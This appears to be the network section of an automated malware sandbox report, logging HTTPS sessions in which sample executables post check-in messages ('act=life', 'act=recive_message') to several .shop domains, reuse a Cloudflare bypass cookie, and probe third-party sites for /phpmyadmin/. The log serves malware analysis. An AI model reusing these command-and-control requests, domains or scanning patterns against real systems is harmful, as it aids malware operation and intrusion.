                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=neZFgK2xMq4gA%2BXJp%2BhXHZJd%2BjG4PdoZ2%2BatogoaVJde9Y5gIZGJe8CulMXTLPlW4FOnG8xpAmw1Im1cNrIV7cFnHghaqodEovN2h5wNQbiy1qLxuQ67N4oqUVDJw4tyXXK%2BYVLPpww4jajr"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850ab7ec7ff9b121-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:12:28 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: aerror #D12
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:12:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                2192.168.2.649712104.21.16.1524437100C:\Users\user\AppData\Local\Temp\FE8B.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:12:28 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                                                                                                                                                                                Host: secretionsuitcasenioise.shop
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:12:28 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: act=life
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:12:29 UTC812INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:12:29 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=bscsv2mivh6og3v3caiiq67gah; expires=Fri, 31-May-2024 04:59:08 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hCtGrXQETlpypyaOxrpSiZPMl6gBkDVGncRcoBo%2B61Pyov1WEjHPFVG5GkyER7TNSCpMNHDJk%2B2XbvhjaHuU0Zi6Ou3yCLRoI%2FvBWaToEf8qTXKHowyllC6uSCPT1OtsBRhOOLgKY2uBD3Et9RnO"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850ab7f3ee1e53b2-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:12:29 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: aerror #D12
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:12:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                3192.168.2.649713172.67.199.1204437100C:\Users\user\AppData\Local\Temp\FE8B.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:12:30 UTC271OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                                                                                                                                                                                Host: claimconcessionrebe.shop
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:12:30 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: act=life
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:12:30 UTC818INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:12:30 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=an6jf4or1d105tvuh284j6laru; expires=Fri, 31-May-2024 04:59:09 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OQvoH9tgHQ3el8gqBsygpzfucL19W1zUABaX%2FX3MBO%2BDsyjE7DZOZ0iAqA%2BD8rDcI7v7f8hXwXol2c9jnFkpJdtl7JnOspDXs7IfmdJwFmwRRfV5En%2Br5%2F7ZxEkBza%2Bi%2FOUKNYtXs7v2EdY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850ab7fcc96c1361-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:12:30 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: aerror #D12
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:12:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                4192.168.2.649715104.21.83.2204437100C:\Users\user\AppData\Local\Temp\FE8B.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:12:31 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                                                                                                                                                                                                Host: liabilityarrangemenyit.shop
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:12:31 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: act=life
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:12:31 UTC567INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:12:31 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pzFNUJnYvkAhmxKNiq9sPzxiOsUUm6wQ9sWyPR%2Bb1OEBDq6BffwmLvUsDO6bTW5cR%2BJZRBr7E4oRVRoMkm59mZZGVPiJvBD%2FrbxmHju31psyz%2BlDjVWeUR0FrrF0vPXWc%2BJW52ZAHDfLm4fYLLw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850ab80428526736-ATL
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:12:31 UTC802INData Raw: 31 31 32 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 1123<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:12:31 UTC1369INData Raw: 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: /cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getE
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:12:31 UTC1369INData Raw: 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 39 52 55 73 55 61 7a 79 42 2e 43 34 61 38 69 33 76 69 71 6e 65 65 46 64 54 35 72 6f 78 46 78 4e 37 47 46 45 74 74 6f 58 72 4c 38 2d 31 37 30 37 31 33 31 35 35 31 2d 30 2d 2f 61 70 69 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 64 64 6f 73 2f 67 6c 6f 73 73 61 72 79 2f 6d 61 6c 77 61 72 65 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: type="text/plain"> <input type="hidden" name="atok" value="9RUsUazyB.C4a8i3viqneeFdT5roxFxN7GFEttoXrL8-1707131551-0-/api"> <a href="https://www.cloudflare.com/learning/ddos/glossary/malware/" class="cf-bt
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:12:31 UTC855INData Raw: 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudfl
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:12:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                5192.168.2.649718104.21.83.2204437100C:\Users\user\AppData\Local\Temp\FE8B.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:12:31 UTC358OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                Cookie: __cf_mw_byp=9RUsUazyB.C4a8i3viqneeFdT5roxFxN7GFEttoXrL8-1707131551-0-/api
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 61
                                                                                                                                                                                                                                                                                                                                                                Host: liabilityarrangemenyit.shop
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:12:31 UTC61OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 47 68 4a 4c 6b 4f 2d 2d 73 65 65 76 70 61 6c 70 61 64 69 6e 26 6a 3d 64 65 66 61 75 6c 74
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: act=recive_message&ver=4.0&lid=GhJLkO--seevpalpadin&j=default
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:12:32 UTC818INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:12:32 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=g6egku89f5ft0250ic5vtkjt5q; expires=Fri, 31-May-2024 04:59:11 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SlDVajWg66c%2FqR2OHCqazmZ5eeVJlJpfYs9RWhuV6ali6SXQe1CO6uIGQ4PFNzrPEfn%2Fcgf2EpapwTHPl6FZmBJgjJ6lj%2Ff8FOJcjy%2BjittPzsqY0lNoWQyPZeICoeLC8v6TTojYib%2BvR4Z32CU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850ab807ca3db10b-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:12:32 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: aerror #D12
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:12:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                6192.168.2.65143796.7.224.178443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:49 UTC175OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: naukrigulf.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:49 UTC435INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                                                Server: AkamaiGHost
                                                                                                                                                                                                                                                                                                                                                                Mime-Version: 1.0
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 274
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 11:14:49 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:49 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Server-Timing: cdn-cache; desc=HIT
                                                                                                                                                                                                                                                                                                                                                                Server-Timing: edge; dur=1
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000 ; includeSubDomains ; preload
                                                                                                                                                                                                                                                                                                                                                                Server-Timing: ak_p; desc="1707131689623_1611129006_213759291_16_9738_101_131_-";dur=1
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:49 UTC274INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 48 31 3e 0a 20 0a 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 6e 61 75 6b 72 69 67 75 6c 66 26 23 34 36 3b 63 6f 6d 26 23 34 37 3b 70 68 70 6d 79 61 64 6d 69 6e 26 23 34 37 3b 22 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 50 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 31 38 26 23 34 36 3b 61 65 65 30 30 37 36 30 26 23 34 36 3b 31 37 30 37 31 33 31 36 38 39 26 23 34 36 3b 63 62 64 62 35
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <HTML><HEAD><TITLE>Access Denied</TITLE></HEAD><BODY><H1>Access Denied</H1> You don't have permission to access "http&#58;&#47;&#47;naukrigulf&#46;com&#47;phpmyadmin&#47;" on this server.<P>Reference&#32;&#35;18&#46;aee00760&#46;1707131689&#46;cbdb5


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                7192.168.2.651408172.66.43.64443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:49 UTC184OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: nuevopacto.runacode.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:49 UTC659INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:49 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 4514
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=15
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 11:15:04 GMT
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VC%2FCmjkta3%2FR%2BVtG8JGdrb%2F7C3IbRBhADPvrpEmV2noPvQOVP%2Fb3lzKhA87FHBG%2Fb6uEoQGS51jpwGhWzqRoL0G6wIKV1N39LPuLmyBe07PF%2F2PDfOGztGECds8qsyd78HJ1ZSxTUdlx"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb66191453fe-ATL
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:49 UTC710INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:49 UTC1369INData Raw: 72 72 6f 72 73 2e 63 73 73 22 20 2f 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 27 63 66 5f 73 74 79 6c 65 73 2d 69 65 2d 63 73 73 27 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: rrors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.add
